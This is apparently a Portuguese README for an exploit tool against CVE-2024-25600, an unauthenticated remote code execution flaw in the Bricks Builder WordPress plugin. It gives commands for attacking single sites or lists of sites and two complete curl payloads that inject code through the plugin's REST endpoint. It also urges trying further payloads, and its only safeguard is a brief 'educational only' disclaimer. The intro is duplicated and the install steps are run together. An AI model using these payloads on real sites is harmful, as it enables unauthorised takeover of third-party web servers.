
Esta ferramenta foi projetada para explorar a vulnerabilidade CVE-2024-25600 encontrada no plugin Bricks Builder para WordPress. A vulnerabilidade permite a execução remota de código sem autenticação em sites afetados. A ferramenta automatiza o processo de exploração recuperando nonces e enviando requisições especialmente elaboradas para executar comandos arbitrários.
Esta ferramenta 🛠️ foi projetada para explorar a vulnerabilidade CVE-2024-25600 🕳️ encontrada no plugin Bricks Builder para WordPress. A vulnerabilidade permite a execução remota de código não autenticada em sites afetados 💻. A ferramenta automatiza o processo de exploração recuperando nonces e enviando requisições especialmente elaboradas para executar comandos arbitrários.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> para iniciar o modo interativo.python exploit.py -l <file_path> para analisar e explorar os sites listados.O PoC base fornecido pela divulgação é o seguinte:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Atualização: Segundo PoC (mais confiável)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
É possível que payloads adicionais possam gerar melhores resultados. Se o meu exploit ou prova de conceito não funcionar para você, encorajo-o a experimentar payloads alternativos para encontrar uma solução mais eficaz.
Substitua [HOST] pelo site alvo e [NONCE] pelo valor do nonce recuperado do site.
Para mais informações sobre a vulnerabilidade CVE-2024-25600, consulte a divulgação detalhada em Snicco.io.
As informações fornecidas neste README são apenas para fins educacionais. Invadir sites ou redes sem autorização é ilegal e antiético. 🚫
Parabéns aos pesquisadores de segurança que descobriram e reportaram esta vulnerabilidade, fornecendo à comunidade informações e ferramentas para ajudar a proteger seus aplicativos web.